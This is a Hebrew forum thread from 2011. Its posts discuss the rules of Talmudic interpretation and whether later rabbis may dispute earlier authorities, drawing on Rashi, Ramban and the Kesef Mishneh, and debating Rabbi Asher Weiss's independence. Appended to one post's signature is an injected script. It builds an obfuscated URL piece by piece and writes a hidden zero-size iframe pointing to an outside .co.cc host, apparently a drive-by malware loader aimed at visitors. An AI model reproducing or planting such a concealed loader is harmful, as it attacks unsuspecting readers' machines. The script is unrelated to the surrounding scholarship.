בית פורומים עצור כאן חושבים

מבוא לכללי הפרשנות והפסק לפי התלמוד והראשונים

שלום אורח. באפשרותך להתחבר או להירשם
הצג 15 הודעות בעמוד הוסף לדף האישי  דווח למנהל שלח לחבר
נשלח ב-19/8/2011 18:05 לינק ישיר 
מבוא לכללי הפרשנות והפסק לפי התלמוד והראשונים

כפי שנתבקשתי וכפי שהבטחתי, אני מציג את הגישה הראויה לפרשנות ולפסק כפי שהיא עולה לדעתי מן התלמוד ומן הראשונים.

הצגת הדברים היא ודאי חלקית, ועם כל אריכותם, קצרה מדי. לגבי חלקם ודאי אפשר להציע אפשרויות פירוש אחרות. ואכן הוצעו. במיוחד בדורות האחרונים.

אבל כמדומה שהציטוט האחרון מכולם יבהיר על מה יש לי להסתמך...

תיכננתי להדגים את השימוש בעקרונות אלו על ידי ניתוח שאלה הלכה למעשה. אבל זה יצטרך לחכות לאשכול אחר. הכתיבה התארכה והזמן התקצר.

וגם כך יש כאן חומר שיצריך השקעה של קריאה ועיון גם למי שכבר מכיר את הדברים. קל וחומר למי שלא.

אמנם סבורני שיש כאן מבוא חשוב ורב ערך להכרת האופן שבו התלמוד ומפרשיו בדורות הראשונים ראו את עצמם, תפקידם ויכולתם.

אלו הם הפרקים:

א. מבוא לתלמוד.

ב. סוגי השאלות וכיצד מחפשים עליהן תשובה.

ג. האם מותר לחלוק (בראיות ובסברה) על ספרי פסק שהתקבלו.

ד. איך מסיקים בימי התלמוד ולאחריו הלכה למעשה?

ה. התנאים הנדרשים לבירור הלכה גם במקרה של מסורת חולקת

(עוד לא התחלתי וכבר לא העתקתי את הסעיף האחרון והייתי צריך להשלים...)

תוקן על ידי מיימוני ב- 19/08/2011 18:07:08

דווח על תוכן פוגעני

נשלח ב-22/8/2011 16:45 לינק ישיר 

יהי אור,

אסביר מדוע אני רואה במעבר מעמדת המסביר והפרשן לעמדה של אחד מהשחקנים מעלה גדולה ועצומה.

לפני כן רק משפט על הטענה של הדרך ארץ: כאשר הב"ח הט"ז והש"ך, או הר"ן והריטב"א, חלקו אחד על השני, וגם על רבנים שקדמו להם בהרבה, זו כן דרך ארץ? אז מה ההבדל? שהם חיו במזרח אירופה של המאה השש עשרה, תקופת פאר בהסטוריה של העולם, ואילו אנו חיים בתקופת שיבת ציון החדשה? כמובן שצריך לדבר בכבוד, ואת זה כולם עושים. השאלה המשמעותית היא עד כמה אתה רואה את מה שנאמר כנתון, ואת תפקידך כמסביר ומנהיר, או עד כמה אתה רואה את עצמך חלק אינטגרלי מהשרשרת של בירור וגילוי 'האמת'.

אז למה זה כל כך חשוב?

אומר שני דברים:

1. תחשוב מה היה קורה להסטוריה של המדע אם המדענים היו ממשיכים לראות את תפקידם כמסבירים של תורת אריסטו. האם היו לנו כעת מכוניות? רכבת קלה? מחשבים? תחשוב מה היה קורה להסטוריה של הפסיכולוגיה, היינו נשארים עם פרויד לנצח (תודה שזה באמת מפחיד). כל תחום מתקדם, ותנאי להתקדמות שלו הוא העצמאות של העוסקים בו. נכונתם להציע את הפירוש שנראה בעיניהם הפירוש הטוב ביותר, את התשובה הטובה ביותר לשאלות היסודיות ביותר. לא לראות במה שנאמר נתון, אמת, ולתפוס את עצמם בתפקיד המסביר והמנהיר (ראש ישיבה ור"מ קלאסי שמתחיל לראות אפילו בתורות הישיבתיות של מזרח אירופה של תחילת המאה הקודמת נתונים שדורשים הסבר ולא היפתוזות שאמורות לפתור שאלות יסודיות כאשר צריך לבחון עד כמה הם אכן פותרות את אותן השאלות) רק מספר דורות הרשו לעצמם לחשוב מחדש. אז נכון שיש לכך גבולות. ולכאורה קו המחשבה שלי אמור לקחת אותנו גם לביקורת על התנאים והאמוראים – חמור ולא כלים, מלך ולא מלכה, וכדומה. אבל עדיין צריך להיות מודעים לבעייתיות שבדורות שלמים שעוסקים בהסבר של דורות קדומים, ולנסות כמה שיותר למזער נזקים. רק כך תוכל התורה להתקדם, להיות אמיתית יותר, נכונה יותר.

2. לכל אדם יש אות משלו בתורה, שפע אותו הוא צריך להוריד לעולם. הרב קוק בספרו אורות התורה מסביר את האמירה הידועה תורה לשמה – לשם התורה, באופן הבא:

"ענין תורה לשמה - לשם התורה. כי מציאות החכמה הוא רצון השי'ת שתהי' בפעל, והיא מציאות יותר נחמדה ומעולה מכל מה שאפשר להחשב... וחכמת התורה הרי היא הגילוי האלהי כפי רצונו ית' הבא מצד עבודתנו ותלמודנו. והנה כל הלומד תורה הוא מוציא מהכח אל הפעל את מציאות חכמתה מצד נפשו, ובודאי אינו דומה האור המתחדש מצד חיבור התורה לנפש זו לאור הנולד מהתחברותה לנפש אחרת, ואם כן הוא מגדיל התורה ממש בלמודו, וכיון שהקב"ה רוצה שיגדיל תורה, הדרך הישר הוא שילמד האדם מצד אהבתו את האור הגדול, שרוצה השי"ת בגילוי מציאותו, שיתגדל יותר ויותר. ומכל שכן לחדש בתורה, שהוא ודאי הגדלת התורה ממש באור כפול"

אינו דומה האור המתחדש מצד חיבור התורה לנפש זו לאור הנולד מהתחברותה לנפש אחרת, קל וחומר כאשר הנפשות חופשיות להביע את דעתן, משוחררות. אז באמת יוצאת תורה חדשה, תורה שמאירה באור המיוחד של אותו האדם. דבר שדרך אגב קל לראות בחוש בתורת הרב וייס, שרבים מדבריו צבועים בצבעי יסוד זהים.

דדווח על תוכן פוגעני

נשלח ב-22/8/2011 00:34 לינק ישיר 

אני לא מכיר את הרב מנחת אשר אישית, אולי שעתי קלטת של שיעור או שניים. וממילא אני לא יכול לדון כלפיו אישית אם יש או אין לו דרך ארץ או לא. אני רק הערתי שזה שהוא מעיז לחלוק מסברתו עצמו על גדולי הראשונים ואחרונים [כמו בדוגמא שהבאת] אינו מעיד דווקא על עליית הדורות. 

יכול להיות שדבריו מסתברים, צודקים, ואף אמתיים. בכל זאת לחלוק בצורה זאת על  גדולי ראשונים ואחרונים אינו דרך ארץ. וצריך לזה אחריות וראיות הרבה יותר מוכרחות ומכריעות [יכול להיות שיש במקרה זו] וכמו שכתבתי למיימוני באשכול אל רב זילברשטיין ופציעה עצמית. 

בכל אופן מה שאתה מתפעל מהשתחררותו של הרב וייס אני לא מסתכל על זה כמעלה. 

דדווח על תוכן פוגעני

נשלח ב-21/8/2011 22:44 לינק ישיר 

יהי אור,
דבריך קשים בעיני - על הרב מנחת אשר אתה מדבר? מדוע לדבר עליו כך? שמעת את שיעוריו הקדושים? תענוג אמיתי. ואם שמעת איך אתה יכול לדבר כך? מחאה חריפה.
מה שיפה מאוד אצלו זה שהוא לא משעבד את שכלו הפורה ואת גדלותו התורנית רק לצורך הסברת הדעות שקדמו לו, אלא  לא פעם מתעמת עם ההסברים הקודמים ומציע הסברים יסודיים משלו. בהקשר הזה הוא שונה מאוד משאר הספרות התורנית של דורנו. (אני בלא ספרים כעת אז אין ביכולתי להדגים). הכל כדרך רבותינו האמיתים שבכל הדורות, ובדרך ארץ, ביראת שמים, ומתוך מתיקות ואהבת תורה ואדם.
רק דוגמה קטנה מהשיעור ששמעתי ביום חמישי תוך כדי הליכה, מה שחבל מאוד שאני לא עושה כעת: ידועה השיטה המופיעה בחלק מרבותינו הראשונים, רבינו ירוחם והראב"ד אם איני טועה, כי על האדם להוציא עד חומש מנכסיו לצורך מצוות עשה. שיטה זו נפסקה להלכה על ידי הרמ"א בסימן תרנו:
הגה: ומי שאין לו אתרוג, או שאר מצוה עוברת, א"צ לבזבז עליה הון רב, וכמו שאמרו: המבזבז אל יבזבז יותר מחומש, אפילו מצוה עוברת (הרא"ש ורבינו ירוחם נ"י ח"ב); ודוקא מצות עשה, אבל לא תעשה יתן כל ממונו קודם שיעבור (הרשב"א וראב"ד)
שואל על כך רבינו: הגמרא בבבלי ב"ק ט' אומרת: 
"אימא: וכן אמר רב אסי. א"ר זירא אמר רב הונא: במצוה - עד שליש. מאי שליש? אילימא שליש ביתו, אלא מעתה, אי איתרמי ליה תלתא מצותא, ליתיב לכוליה ביתא? אלא אמר ר' זירא: בהידור מצוה - עד שליש במצוה"
כלומר, עד שליש יותר ממה שמוצא. שואל רב אשר: אם כן, אם ימצא חמש מצוות יתן את כל רכושו? (ידעתי שאפשר להשיב שהגמרא מדברת על הידור מצוה)
רבינו ירוחם לומד את דינו מצדקה - בה נאמר המבזבז אל יבזבז יותר מחומש, אך שם התקנה לא הייתה לחייב נתינת חומש. היא אסרה על מתן יותר מחומש!
לדעתו של ר' אשר אין ליתן גדר אחיד, ובכל מצווה על האדם להשקיע כפי מה שמקובל להשקיע באותה מצווה. למשל: בתפילין, אם אדם גר במקום בו יש רק סופר אחד, ואותו סופר דורש ממנו סכום מופקע שגבוה בהרבה מהסכום המקובל, פטור האדם גם אם הסכום שנדרש ממנו איננו חומש מנכסיו.
מה מיוחד בדברים אלו? שהוא דן בצורה משוחררת, לא רק מנסה להסביר את הדעות שקדמו לו, אלא מתווכח איתם, כדרכה של תורה, כדרך רבותינו הראשונים וגדולי הפוסקים,ומנסה להציע את השיטה הטובה בעיניו. שכל זה בא מתלמיד חכם אמיתי, אחד מתלמידי החכמים המובהקים שבדורנו, שגם מקרב אליו את הציונים דתיים - שמחה גדולה. 
הלוואי שבעולם התורה הייתה תרבות של שבתון לצורך כתיבה. שהיה מפסיק לשנה שנתיים משיעוריו בכוללים ובישיבות, ומתפנה לכתוב ספרים על נושאים. למשל: חיבור על כללי המצוות, תחום בו הוא נוגע רבות. או חיבור גדול ומקיף על תרי"ג מצוות, מעין מנחת חינוך חדש. זו הייתה תרומה גדולה לעולם התורה, תרומה לדורות.

דדווח על תוכן פוגעני

נשלח ב-21/8/2011 16:18 לינק ישיר 

זה שיש מישהו שאין לו הדרך ארץ כלפי רבותינו ראשונים ואחרונים אינו סותר את ירידת הדורות. אדרבה, הוא תוצאה של ירידת הדורות.. 

דדווח על תוכן פוגעני

נשלח ב-21/8/2011 13:40 לינק ישיר 

קסת,
אני רק הלצה - אתה קורא אותו, או יותר חזק שומע, בטח בשנים האחרונות שהוא נהיה יותר ויותר משוחרר, ואתה אחר כך קורא את שאר דברי רבותינו שבכל הדורות, והתחושה שאתה מקבל היא - אין שום סיבה להניח שקיימת ירידה כל שהיא. אדרבה, אצל המשוחררים יחסית מתרבות הכתיבה והלימוד הישיבתיות, אתה רואה עלייה והתפתחות (וידעתי את החילוק בין אנליטי לסינתטי - לא קונה אותו, הוא בא להסביר מיתוס שקל להסביר אותו בדרכים אחרות).

דדווח על תוכן פוגעני

נשלח ב-21/8/2011 12:36 לינק ישיר 

אייל
מה הכוונה כפי שמעידים על כך כתביו המופלאים של ר' אשר וויס?

תוקן על ידי קסת ב- 21/08/2011 12:38:21

דדווח על תוכן פוגעני

נשלח ב-20/8/2011 22:30 לינק ישיר 

אנסה להתייחס לשאלה השלישית של מיימוני: האם מותר לחלוק על פסק של דורות קודמים. המקורות המשמעותיים בשאלה זו הן כמעט כל סוגיה שבגמרא בה מקשים על אמורא מדברי מקור תנאי. הגמרא אף פעם לא מתרצת, חוץ מרב, כי מותר לאמורא לחלוק על תנא. הנחת היסוד של הגמרא היא אפוא שאמוראים אינם חולקים על תנאים. מצב דומה קיים ביחס לראשונים: מוסכם עליהם שהם אינם חולקים על הגמרות. לכן הראשונים מקשים אחד על השני מדברי הגמרא. אף אחד מהם אינו אומר כתירוץ לשיטתו: אני פשוט חולק על דברי הגמרא.
ממה נובע דבר זה? מדוע האמוראים אינם חולקים על תנאים, וכן הראשונים לא חולקים על הגמרא?
קושי זה מתעצם כאשר אנחנו נפגשים עם דברי הרמב"ם בהלכות ממרים ב', א':
ב"ד גדול שדרשו באחת מן המדות כפי מה שנראה בעיניהם שהדין כך ודנו דין, ועמד אחריהם ב"ד אחר ונראה לו טעם אחר לסתור אותו הרי זה סותר ודן כפי מה שנראה בעיניו, שנאמר אל השופט אשר יהיה בימים ההם אינך חייב ללכת אלא אחר בית דין שבדורך.
אם בית דין יכול לחלוק על בית דין אחר, בדברים שנוגעים לדרשת הכתובים, ק"ו שחכם יכול לחלוק על חכם אחר
ממה נובעת אפוא סמכותם של התנאים? מדוע האמוראים לא חלקו עליהם? מדוע הראשונים לא חלקו על האמוראים?
רבותינו השיבו על כך מספר תשובות:
נפתח בדברי הרב יוסף קארו בספרו כסף משנה, דברים שנחזור אליהם לבסוף:
"
ואם תאמר אם כן אמאי לא פליגי אמוראי אתנאי דהא בכל דוכתא מקשינן לאמורא ממתניתין או מברייתא וצ"ל אנא דאמרי כי האי תנא ואם לא יאמר כן קשיא ליה וכפי דברי רבינו הרשות נתונה להם לחלוק על דברי התנאים. ואפשר לומר שמיום חתימת המשנה קיימו וקבלו שדורות האחרונים לא יחלקו על הראשונים וכן עשו גם בחתימת הגמ' שמיום שנחתמה לא ניתן רשות לשום אדם לחלוק עליה"
מיום חתימת המשנה קיימו וקבלו שדורות האחרונים לא יחלקו על הראשונים
תשאלו: ואז מה? אז מה אם הציבור החליט? האם הוא יכול להחליט גם אחרת?
תשובתו של הרב אלחנן וסרמן התבססה על שתי הנחות:
1.
לרוב חכמי ישראל יש דין של בית דין גדול
2.
רוב חכמי ישראל החליטו בעת חתימת המשנה שאין לחלוק עליה, וכן בעת חתימת התלמוד
זוהי אם כך החלטה של בית דין הגדול. ככזאת חכם פרטי לא יכול לחלוק עליה.
ואם יקום בית דין גדול חדש, האם הוא יוכל לחלוק על החלטה זו, ולהחליט אחרת?
הרב אברהם ישעיהו קרליץ, החזון איש, הוטרד מאפשרות זו. הוא פירש אחרת את החלטת האמוראים: האמוראים הכירו בכך שהתנאים היו הרבה יותר חכמים מהם. הם הבינו שלא שייך שהם יחלקו עליהם: זה כמו שאישה שלא מבינה בכלכלה תחלוק על נתניהו.
דברי החזון איש קשים לכאורה: האם באמת הבדל החכמה כה גדול? הרי החכמה רק עולה ועולה כפי שמעידים כתביו המופלאים של הרב אשר וייס. ראיה דומה לכך ניתן למצוא בתורת היחסות ועוד ועוד
בחוגי מרכז הרב רגילים להסביר זאת אחרת: בצורה דומה במקצת לרב וסרמן, אך שונה: לא בצורה טכנית - לרוב חכמי ישראל יש דין בית דין גדול - אלא כך: לעצם קבלת האומה יש כוח מחייב. האומה קיבלה על עצמה את המשנה, ואח"כ את התלמוד, וקבלה זו מחייבת. ניתן להסביר בדרך דומה את סמכות השו"ע - האומה קיבלה על עצמה את פסיקת השו"ע, ולכן היא מחייבת. כמובן שזה קשה מאוד: קשה לומר שהאומה קיבלה על עצמה את פסיקת השו"ע - וכי הב"ח והט"ז ושאר נושאי הכלים לא חולקים רבות על דבריו? ואם הם חולקים - ולעיתים פוסקים כמותם - אז לא קיבלנו.
תשאלו על כך: מניין שלקבלת האומה תוקף מחייב? מאיזה דין היא מחייבת? מדין מנהג
אנסה להציע לבסוף הסבר אחר לדברי הכסף משנה: כך קיבלנו. זה כלל התנהגות. כך אנו נוהגים. לא שבשל כך קיימת חובה הלכתית. מבחינת ההלכה הצרופה אתה יכול לפסוק אחרת. אבל כך אנו עושים. ואם תפסוק אחרת? סבבה, אנחנו ננסה למנוע מהציבור ללכת איתך, נפעל נגדך. במידה ותצליח ודרכך תתפשט - שוב סבבה. נראה. תנסה
האם אנחנו רוצים לנסות ולנהוג אחרת? לנסות ולפסוק שלא כתנאים, שלא כתלמוד? לגבי הפסיקה למעשה כרגע אני לא רואה סיבה. אבל יש לכך משמעות בהקשרים אחרים. קחו לדוגמה את פסול נשים לעדות. האם הנחת היסוד שלי היא שהתורה פוסלת נשים לעדות, ועלי להסביר זאת, להסביר למה זה מוצדק חלילה? לא בטוח. אני יכול לומר: כך סבור התנא. כך הוא דרש את התורה. הלכה למעשה כרגע אין לכך משמעות, אז אין צורך סתם לעשות מהומות. אבל הייתי דורש אחרת, ואינני רואה בהכרח בדרשתו את האמת המוחלטת, האמת שעלי להסביר

דדווח על תוכן פוגעני

נשלח ב-19/8/2011 18:13 לינק ישיר 

ה. התנאים הנדרשים לבירור הלכה גם במקרה של מסורת חולקת

כאן מספר המקורות הוא גדול מאד ויש כאמור גישות שונות.

בינתים אני מביא שלושה מקורות חשובים מאד שעליהם אני מסתמך בגישתי שלי, וכמובן לא רק אני דוגל בגישה זו.

בראש מסכת הוריות למדנו על תלמיד חכם שרואה שבית דין טועה אבל סבור שחובתו לציית להם גם אם דעתו הפוכה. ובכן, זו נקראת טעות ולפעמים חייבים עליה קרבן. אסור לאדם לבטל דעתו כאשר הוא יודע שהוא צודק. וכדי לדעת שהוא צודק, אין צורך לדעת את כל המקורות. די לדעת את אותה סוגיה. (כפי שהפניתי בעבר, יש לעיין בהוריות ב ב ובתוספות רא"ש שם לגבי "בן עזאי לאותה סוגיה").

ואיך יכין אדם את עצמו לקראת הדרגה של תלמיד חכם שבידו להכריע?

אני מביא קטע אחד קטן מדיון ארוך, שהוא אחד המקומות הבודדים בתלמוד שבהם מרוכזות הנחיות ללימוד ולצמיחה.

תלמוד בבלי מסכת עבודה זרה דף יט עמוד א

אמר רבא: לעולם ילמד אדם תורה ואח"כ יהגה, שנאמר: בתורת ה', והדר ובתורתו יהגה.

רש"י מסכת עבודה זרה דף יט עמוד א

ילמד אדם - מרבו עד שתהא גירסת התלמוד ופירושו שגורה לו בפיו.

ואח"כ יהגה - יעיין בתלמודו לדמות מילתא למילתא להקשות ולתרץ ובראשונה לא יעשה כן שמא יבטל והרב לא ימצא לו כל שעה ועוד לאחר ששנה הרבה הוא מתיישב בתלמודו ומתרץ לעצמו דבר הקשה

ראו כיצד מתאר רש"י את התהליך שעובר על הלומד. לאחר שיש לו ידע רחב במסורת (ולא כל המסורת!) זה מספיק כדי שיתחיל לזהות קושיות וסתירות וכדי שיוכל לתרצן לעצמו!

לאחר שרכש אדם את היכולת הזו, כיצד הוא יכריע בשאלות החדשות והמתחדשות? והאם יהיה רשאי לחלוק על מסורות של לימוד, פירוש והכרעה?

אחד המאמרים החשובים ביותר (וזו לא גוזמא) בנושא זה נכתב בידי הרמב"ן (וכמדומה כבר צוטט בפורום שלנו פעמים רבות).

הרמב"ן כתב פירוש על ספר הרי"ף ובו התווכח עם החולקים על הרי"ף. הכתיבה נמשכה זמן רב ובינתים התמתן הרמב"ן מסגנונו הקשה שהרשה לעצמו מתוך "ריתחא דאורייתא" (התלהבות הלימוד ובקשת האמת). ובהקדמה לחלק השני של פירושו, בהקדמה ל"מלחמות ה' " על ברכות, הוא מתאר את דרך הלימוד והפסק. הוא מתחיל בהתנצלות על חוסר היכולת להביא הוכחות מושלמות, כפי שאנו קוראים להן היום, נגד הפרשנים שחלקו על הרי"ף אבל מסביר שאין זה חסרון ביכולתו אלא מטיבה של חכמת התלמוד. והבה נקרא יחד את המילים ונעמוד על משמעותן.

ואתה, המסתכל בספרי,

אל תאמר בלבבך כי כל תשובתי על הרב רבי זרחיה ז"ל כולן בעיני תשובות נצחות ומכריחות אותך להודות בהם על פני עקשותך

ותתפאר בהיות מספק אחת מהן על לומדיה

או תטריח על דעתך להכנס בנקב המחט לדחות מעליך הכרח ראיותי.

אין הדבר כן.

[כלומר, איני מתיימר לטעון שההוכחות הן כאלו שאין להתגבר עליהן – ונראה לקמן מהו "להתגבר" אז אל תצפו ליותר מדי וממילא גם אין טעם להציג דעות חולקות מנומקות. הרמב"ן יודע שיש אפשרויות אחרות בלימוד סוגיה מלבד זו שהוא יציג]

כי יודע כל לומד תלמודנו שאין במחלוקת מפרשיו ראיות גמורות ולא ברוב קושיות חלוטות.

שאין בחכמה הזאת מופת ברור, כגון חשבוני התשבורות ונסיוני התכונה.

[כל מי שבעל נסיון בלימוד יודע שיש מחלוקת בין המפרשים, זה יאמר בכה וזה בכה. אבל אף צד לא יוכל להביא ראיה ניצחת, כזו שהצד השני יצטרך להשתתק ולומר: שפתים יישק, דברים נכוחים, אי אפשר לחלוק. לא ולא. גם אין קושיות שמכוחן יצטרך בעל פירוש לומר: טעיתי, חוזרני בי.

(ברוב=בדרך כלל)

האם יש תחומי לימוד שבהם האידיאל הזה מתקיים? אכן כן. לימוד המתמטיקה והאסטרונומיה].

אבל נשים כל מאודנו – ודיינו – מכל מחלוקת, בהרחיק אחת מן הדעות בסברות מכריעות,

ונדחוק עליה השמועות

ונשים יתרון הכשר לבעל דינה מפשטי ההלכות

והוגן הסוגיות עם הסכמת השכל הנכון.

[אז מה כן? יש שתי אפשרויות. דרך השלילה ודרך החיוב.

אפשר להציג נימוקים והוכחות נגד אחת מן הדעות החולקות, ואז היה תראה פחות אמינה. ויש לדקדק: זו הוכחה מכריעה, כלומר עדיפה אבל לא מוכחת.

אפשר לעשות זאת על ידי סברה שממנה משתמע לא כאותה דעה.

ואפשר להציג סוגיות שלא יתפרשו היטב לפי המהלך שאנו רוצים לדחות. ושוב, לא שאי אפשר לדחוק ולהישאר עם הדעה החולקת, ואפשר גם לדחות את הסוגיה ולומר שהיא אליבא דמאן דאמר אחר. או כל אחת מן השיטות שבהן כל לומד תלמוד יודע לדחות ראיות נגדיות. אבל משקל נגד הדעה החולקת יש כאן.

ואפשר לחזק את הדעה שאני חפץ ביקרה על ידי שאני אוסף סוגיות שהפירוש ה"פשטני" שלהן הולם את שיטתי.

או אפילו שהן נלמדות יותר בקלות לפי המהלך והסברות שאני מציע. גם זו עדיפות (או "הכרעה", כעין הטית כף המאזנים של השכל) ולא הוכחה מוחלטת. רשאי אדם ביושר אינטלקטואלי לומר: הדרך האחרת נראית לי ואף על פי שכאן, בסוגיה זו, זה דחוק. וכן מצאנו גם בתלמוד.

ומי השופט שקובע מה יותר פשטני ומה יותר תואם בקריאת סוגיה? אותו מכשיר מסתורי שהרמב"ן ובני דורו הכירו בתור "שכל".]

וזאת תכלית יכלתנו

וכוונת כל חכם וירא האלוהים בחכמת הגמרא.

[וזה השיא שאנו מסוגלים אליו. וזה כל מה שחכם וירא שמים משתדל לעשות בלימוד חכמת התלמוד. לא מעבר לזה. אין יותר מזה].

יש לשים לב שהרמב"ן לא רק מסביר כיצד מפתחים סברה וכיצד מעגנים אותה, אם מצד היושר הפנימי שלה ואם מצד התאמתה לסוגיות אחרות, רצוי לכמה שיותר. אלא שהוא גם מראה כי דרך כזו מספיקה כדי לצאת נגד פירושים של דורות קודמים.

(אפשר אמנם לטעון שהוא מדבר רק על בחירה בין פירושים שכבר נאמרו במסורת ולא הצעת פירושים חדשים לגמרי. מעניין לבדוק אם בפירושו על הרי"ף כאן אין הוא מציע פירושים חדשים לגמרי, אבל זו לא תהיה ראיה גמורה. אפשר שהוא סבר שהפירושים החדשים שלו נובעים מכוחם של פירושים אחרים ולא פירט. אבל בעצם זה מה שאנו עושים תמיד בלימודנו. לעולם אין אנו סבורים שחידשנו לגמרי משהו. אנו סבורים שקודמינו התכוונו בדיוק לכך).

והרמב"ן בהמשך דבריו, שלא העתקתי, מביא ראיה לדרכו זו מאמירתו של רבא לשני תלמידיו הגדולים, שהעתקתי לעיל. שמע מינה שהרמב"ן למד את דברי רבא כהדרכה כללית לדורות שלאחר הכרעות התנאים. בדורות שלאחר רבא מותר לפרשן ואף חייב הוא ללכת אחרי שיקול דעתו. כי "אין לדיין אלא מה שעיניו רואות" והוא ילך אחרי מה שיענה על תנאי הפרשנות של הרמב"ן שמבטיחים רק העדפה ולא הוכחה ניצחת. ודי בזה לחכם וירא אלוקים.

_(תיקון קטנטן של הדגשה מיותרת ותוספת ביאור למונח קשה למי שאינו בקיא בלשון הראשונים)

שומר פיו ולשונו - שומר מצרות נפשו ******* type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");

תוקן על ידי מיימוני ב- 19/08/2011 18:18:29

דדווח על תוכן פוגעני

נשלח ב-19/8/2011 18:12 לינק ישיר 

ד. איך מסיקים בימי התלמוד ולאחריו הלכה למעשה?

אם נרשה לעצמנו או נראה זאת כחובה לעצמנו ללמוד ולהבין ולהכריע בהתאם ליכולתנו, איך עושים זאת למעשה?

על ידי לימוד המסורות, עיון במקורות, והסקת מסקנות. בלשוננו היום נקרא לכך זיהוי הנחות יסוד. וכמובן זו משימה קשה ביותר, שהרי גם כאשר יש לנו מסורת מילולית על הטעם המפורש, אין אנו יודעים תמיד בוודאות את פירוש המילים ואת כוונתן. יש דברים שאי אפשר למסור במילים באופן חד משמעי כלל. על אחת כמה וכמה שיש לפעמים מחלוקות לגבי הטעם, ומי יודע אם הקיף את כל הנאמר בסוגיה פלונית? כל זאת בתנאי שבאמת הדברים כתובים ומפורשים. ומה נעשה כאשר הדברים אינם מסורים לנו כלל? כאשר השאלה חדשה? לפי מה מכריעים בה?

בלשון הגמרא שיטת הלימוד לגבי מקרים חדשים נקראת "לדמות מילתא למילתא". לדמות ענין לענין. כלומר להשוות ענינים זה לזה ומתוך הדמיון והשוני להבין את הטעם והחילוקים. מה הכללים, מתי יש להחיל אותם ומתי לא.

תלמוד בבלי מסכת בבא בתרא דף קל עמוד ב

תנו רבנן: אין למדין הלכה לא מפי למוד ולא מפי מעשה - עד שיאמרו לו הלכה למעשה, שאל ואמרו לו הלכה למעשה - ילך ויעשה מעשה, ובלבד שלא ידמה.

מאי ובלבד שלא ידמה? והא כל התורה כולה דמויי מדמינן לה!

אמר רב אשי, הכי קאמר: ובלבד שלא ידמה בטרפות; דתניא: אין אומרים בטרפות זו דומה לזו, ואל תתמה, שהרי חותכה מכאן ומתה, חותכה מכאן וחיתה.

א"ל ר' אסי לר' יוחנן: כי אמר לן מר הלכה הכי, נעביד מעשה? אמר: לא תעבידו עד דאמינא הלכה למעשה.

אם יש הלכה למעשה בנושא מסויים, יש לסמוך על המסורת (ושוב, יש כאן לכאורה מחלוקת רבא ור' יוחנן, האם מסורת למעשה מחייבת או שתלמיד שסבור שמבין אחרת מרבו יכול לשנות או חייב לשנות).

אם אין מסורת מדוייקת, אין מנוס מדימוי מילתא למילתא, אלא שצריך להיזהר מאותם תחומים שבהם הסברא אינה מועילה כי הם אינם תלויים בסברה אלא במציאות העובדתית. דוגמא לדבר דיני טריפות שבהם אי אפשר לדון קל וחומר (שהרי יש מקום שחותכים ברגל והבהמה נטרפת ויש לחתוך חלק גדול עוד יותר מהרגל והבהמה תחיה).

אבל בכל מקום אחר ודאי שהדרך היא לדמות נושא לנושא, לחשוב בעצמנו, על סמך ידיעותינו, ולהכריע.

(כאן ראוי להדגיש שלא הכל הלכו בדרך זו. בסוגיה מפורסמת שלא הבאתי כאן מדגים ר' יוחנן לריש לקיש כיצד ניתן לענות על שאלה חמורה בדיני גיטין על סמך דימוי מילתא למילתא, ואז הוא חוזר בו ואומר: וכי בגלל שאנו מדמים נעשה מעשה?

אז האם יש לנו כאן מחלוקת רב אשי ור' יוחנן?

למעשה, אולי זו מחלוקת ר"ע ור"א? כאשר רבי אליעזר לא רצה לענות לשאלות חדשות כלל ולא לומר דבר שלא שמע מרבו, ורבי עקיבא היה מוכן תמיד למצוא תשובות חדשות ולעגנן במקורות, ואפילו לחלוק על מסורות קודמות מכוח ראיות?

למעשה, למרות הדגם הנאצל של ענווה שמציג לנו ר' יוחנן, לפוסק – לא לטכנאי ההלכה שמכיר רק תשובות נתונות – אין ברירה אחרת. עליו לומר על עצמו: במקום שאין אנשים, השתדל להיות איש. וקיצרתי, שוב, הרבה מדי...)

דדווח על תוכן פוגעני

נשלח ב-19/8/2011 18:08 לינק ישיר 

ג. האם מותר לחלוק (בראיות ובסברה) על ספרי פסק שהתקבלו

כל מה שנכתב לעיל חל כאשר השאלה עדיין פתוחה. אך מה יקרה כאשר התקבל פסק? ומה זה "התקבל"? הוכח? עמד להצבעת הרוב? האם בכלל ניתן לקבוע הלכה מחייבת כאשר אין מוסד מרכזי כמו הסנהדרין?

מי קובע איך ומה התקבל?

גם בשאלה זו יש גישות. ויש טעם לכל אחת ואחת.

מצד אחד, התלמוד עצמו (וגם המשנה) מעידים לנו שאין הדור המאוחר חולק על קודמו. אפשר מפני שהם נחשבים לחכמים היודעים יותר, מוכשרים יותר ומבינים יותר ושיקול דעתם רחב יותר משל הבאים אחריהם. אפשר שגם הדור החדש של החכמים מוכשר מאד, אבל חסרים להם ידע ופרטים שהיו לדור הקודם. כלומר המניעה אינה העדר כשרון ויכולת אלא העדר מידע. ואילו היה ניתן להשלים את המידע היה אפשר להסיק מסקנות בעצמנו. אם נרצה, אפשר לראות בכך מחלוקת בין רבי אליעזר (האוסר לערער על דורות קודמים ומתיר רק לפרש באופן שלא יחלוק על המסורת) לבין רבי עקיבא, הדוגל בעצמאות מוחלטת.

ומה אם יש מסורות סותרות על הפסק? מה עושים? לכאורה כאן אנו ניצבים לפני אותו מצב שתואר לעיל. צריך לברור ולהכריע. אם כי אפשר שיש להניח לכל אדם ולכל מקום על מנהגו ועל המסורת הפרטית שלו. וגם כאן יש מחלוקת ושיטות...

ומה אם כבר יש מסורת של פסק? האם מותר לערער על פסק נתון שהתקבע?

בתלמוד עצמו מצאנו את אחד מגדולי האמוראים, רבא, אומר לשני תלמידיו לשמור על חירות הבירור וההכרעה.

תלמוד בבלי מסכת בבא בתרא דף קל עמוד ב

אמר להו רבא לרב פפא ולרב הונא בריה דרב יהושע: כי אתי פסקא דדינא דידי לקמייכו וחזיתו ביה פירכא, לא תקרעוהו עד דאתיתו לקמאי, אי אית לי טעמא אמינא לכו, ואי לא - הדרנא בי; לאחר מיתה, לא מיקרע תקרעוהו ומגמר נמי לא תגמרו מיניה, לא מיקרע תקרעיניה - דאי הואי התם דלמא הוה אמינא לכו טעמא, מגמר נמי לא תגמרו מיניה - דאין לדיין אלא מה שעיניו רואות.

